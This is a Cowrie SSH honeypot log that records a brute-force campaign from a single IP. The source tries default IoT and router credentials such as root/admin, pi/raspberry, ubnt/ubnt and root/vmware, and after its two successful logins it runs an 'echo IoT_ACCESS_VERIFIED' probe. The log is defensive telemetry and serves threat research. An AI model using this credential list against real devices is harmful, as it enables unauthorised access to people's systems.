{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"13.3","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 13.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:20:03.630969Z","src_ip":"212.227.235.229","session":"9dd3080c991e"}
{"eventid":"cowrie.session.closed","duration":"142.8","message":"Connection lost after 142.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:20:15.242062Z","src_ip":"212.227.235.229","session":"9dd3080c991e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49372,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c575851df0a","protocol":"ssh","message":"New connection: 212.227.235.229:49372 (1.2.3.4:22) [session: 2c575851df0a]","sensor":"my-vps","timestamp":"2025-08-28T23:20:39.855146Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:20:40.193565Z","src_ip":"212.227.235.229","session":"2c575851df0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51626,"dst_ip":"1.2.3.4","dst_port":22,"session":"34a1b5e90802","protocol":"ssh","message":"New connection: 212.227.235.229:51626 (1.2.3.4:22) [session: 34a1b5e90802]","sensor":"my-vps","timestamp":"2025-08-28T23:20:40.288747Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:20:40.624249Z","src_ip":"212.227.235.229","session":"34a1b5e90802"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:20:40.625709Z","src_ip":"212.227.235.229","session":"34a1b5e90802"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:20:42.550600Z","src_ip":"212.227.235.229","session":"34a1b5e90802"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:20:43.317667Z","src_ip":"212.227.235.229","session":"34a1b5e90802"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-28T23:20:43.318446Z","src_ip":"212.227.235.229","session":"34a1b5e90802"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:20:43.585301Z","src_ip":"212.227.235.229","session":"34a1b5e90802"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:20:43.587080Z","src_ip":"212.227.235.229","session":"34a1b5e90802"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37304,"dst_ip":"1.2.3.4","dst_port":22,"session":"5335206474a6","protocol":"ssh","message":"New connection: 212.227.235.229:37304 (1.2.3.4:22) [session: 5335206474a6]","sensor":"my-vps","timestamp":"2025-08-28T23:20:43.715641Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:20:43.913437Z","src_ip":"212.227.235.229","session":"5335206474a6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:20:43.914100Z","src_ip":"212.227.235.229","session":"5335206474a6"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-28T23:20:45.200668Z","src_ip":"212.227.235.229","session":"5335206474a6"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:20:46.518919Z","src_ip":"212.227.235.229","session":"5335206474a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51636,"dst_ip":"1.2.3.4","dst_port":22,"session":"da6cf7feda67","protocol":"ssh","message":"New connection: 212.227.235.229:51636 (1.2.3.4:22) [session: da6cf7feda67]","sensor":"my-vps","timestamp":"2025-08-28T23:20:46.627830Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:20:46.840955Z","src_ip":"212.227.235.229","session":"da6cf7feda67"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:20:46.841660Z","src_ip":"212.227.235.229","session":"da6cf7feda67"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-28T23:20:48.574929Z","src_ip":"212.227.235.229","session":"da6cf7feda67"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:20:50.257804Z","src_ip":"212.227.235.229","session":"da6cf7feda67"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39624,"dst_ip":"1.2.3.4","dst_port":22,"session":"96847f6cdd51","protocol":"ssh","message":"New connection: 212.227.235.229:39624 (1.2.3.4:22) [session: 96847f6cdd51]","sensor":"my-vps","timestamp":"2025-08-28T23:20:50.346801Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:20:50.602160Z","src_ip":"212.227.235.229","session":"96847f6cdd51"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:20:50.603790Z","src_ip":"212.227.235.229","session":"96847f6cdd51"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T23:20:52.886616Z","src_ip":"212.227.235.229","session":"96847f6cdd51"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:20:54.330172Z","src_ip":"212.227.235.229","session":"96847f6cdd51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56890,"dst_ip":"1.2.3.4","dst_port":22,"session":"2877ed928d87","protocol":"ssh","message":"New connection: 212.227.235.229:56890 (1.2.3.4:22) [session: 2877ed928d87]","sensor":"my-vps","timestamp":"2025-08-28T23:20:54.439459Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:20:54.844142Z","src_ip":"212.227.235.229","session":"2877ed928d87"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:20:54.844902Z","src_ip":"212.227.235.229","session":"2877ed928d87"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345","message":"login attempt [admin/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T23:20:56.072896Z","src_ip":"212.227.235.229","session":"2877ed928d87"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:20:57.461197Z","src_ip":"212.227.235.229","session":"2877ed928d87"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41978,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d0773ab8bc7","protocol":"ssh","message":"New connection: 212.227.235.229:41978 (1.2.3.4:22) [session: 5d0773ab8bc7]","sensor":"my-vps","timestamp":"2025-08-28T23:20:57.603852Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:20:57.825094Z","src_ip":"212.227.235.229","session":"5d0773ab8bc7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:20:57.825910Z","src_ip":"212.227.235.229","session":"5d0773ab8bc7"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T23:20:59.348917Z","src_ip":"212.227.235.229","session":"5d0773ab8bc7"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:01.377170Z","src_ip":"212.227.235.229","session":"5d0773ab8bc7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58436,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f8bad93a9d8","protocol":"ssh","message":"New connection: 212.227.235.229:58436 (1.2.3.4:22) [session: 4f8bad93a9d8]","sensor":"my-vps","timestamp":"2025-08-28T23:21:01.486320Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:21:01.749877Z","src_ip":"212.227.235.229","session":"4f8bad93a9d8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:21:01.750636Z","src_ip":"212.227.235.229","session":"4f8bad93a9d8"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T23:21:03.320104Z","src_ip":"212.227.235.229","session":"4f8bad93a9d8"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:04.864658Z","src_ip":"212.227.235.229","session":"4f8bad93a9d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45930,"dst_ip":"1.2.3.4","dst_port":22,"session":"c54289107898","protocol":"ssh","message":"New connection: 212.227.235.229:45930 (1.2.3.4:22) [session: c54289107898]","sensor":"my-vps","timestamp":"2025-08-28T23:21:04.996281Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:21:05.322648Z","src_ip":"212.227.235.229","session":"c54289107898"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:21:05.324304Z","src_ip":"212.227.235.229","session":"c54289107898"}
{"eventid":"cowrie.login.success","username":"root","password":"vmware","message":"login attempt [root/vmware] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:21:06.500897Z","src_ip":"212.227.235.229","session":"c54289107898"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:21:07.082473Z","src_ip":"212.227.235.229","session":"c54289107898"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-28T23:21:07.083373Z","src_ip":"212.227.235.229","session":"c54289107898"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:07.300669Z","src_ip":"212.227.235.229","session":"c54289107898"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:07.301984Z","src_ip":"212.227.235.229","session":"c54289107898"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58262,"dst_ip":"1.2.3.4","dst_port":22,"session":"73d354fd446e","protocol":"ssh","message":"New connection: 212.227.235.229:58262 (1.2.3.4:22) [session: 73d354fd446e]","sensor":"my-vps","timestamp":"2025-08-28T23:21:07.394533Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:21:07.633288Z","src_ip":"212.227.235.229","session":"73d354fd446e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:21:07.633972Z","src_ip":"212.227.235.229","session":"73d354fd446e"}
